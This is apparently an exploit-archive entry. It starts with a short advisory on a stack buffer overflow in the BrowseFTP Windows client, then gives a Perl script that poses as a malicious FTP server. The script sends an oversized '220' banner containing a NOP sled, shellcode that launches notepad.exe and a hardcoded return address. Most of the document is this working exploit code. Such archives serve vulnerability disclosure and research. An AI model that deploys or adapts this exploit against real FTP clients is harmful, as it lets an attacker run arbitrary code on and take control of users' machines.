32 lines
No EOL
1.2 KiB
Perl
Executable file
32 lines
No EOL
1.2 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/3781/info
|
|
|
|
BrowseFTP is an ftp client that runs on various Microsoft Windows operating systems.
|
|
|
|
An issue has been reported which could allow for a malicious ftp server to execute arbitrary code on a BrowseFTP client user.
|
|
|
|
This is acheivable when a BrowseFTP user connects to an ftp host, if the FTP server '220' response is of excessive length. The stack-based overflow condition can allow for malicious administrators to execute arbitrary code on (and gain control of) client hosts. It is also possible to crash the client.
|
|
|
|
#!/usr/local/bin/perl
|
|
|
|
#------------------------------------------------------------------------
|
|
# Browse FTP exploit( run under inetd )
|
|
# written by Kanatoko
|
|
# http://www.jumperz.net/
|
|
#------------------------------------------------------------------------
|
|
$|=1;
|
|
|
|
#egg written by UNYUN (http://www.shadowpenguin.org/)
|
|
$egg = "\xEB\x22\x5B\x53\x32\xE4\x83\xC3\x0B\x88\x23\xB8\x24\x98\x01\x78";
|
|
$egg .= "\xFF\xD0\x33\xC0\x50\xB4\x78\xC1\xE0\x10\x33\xDB\x66\xBB\x04\x55";
|
|
$egg .= "\x0B\xC3\xFF\xD0\xE8\xD9\xFF\xFF\xFF";
|
|
$egg .= "notepad.exe";
|
|
|
|
#018DFB20
|
|
$ret = "\x20\xFB\x8D\x01";
|
|
|
|
$buf = "\x90" x 2428;
|
|
$buf .= $egg;
|
|
$buf .= "A" x 299;
|
|
$buf .= $ret;
|
|
|
|
print "220 $buf\r\n"; |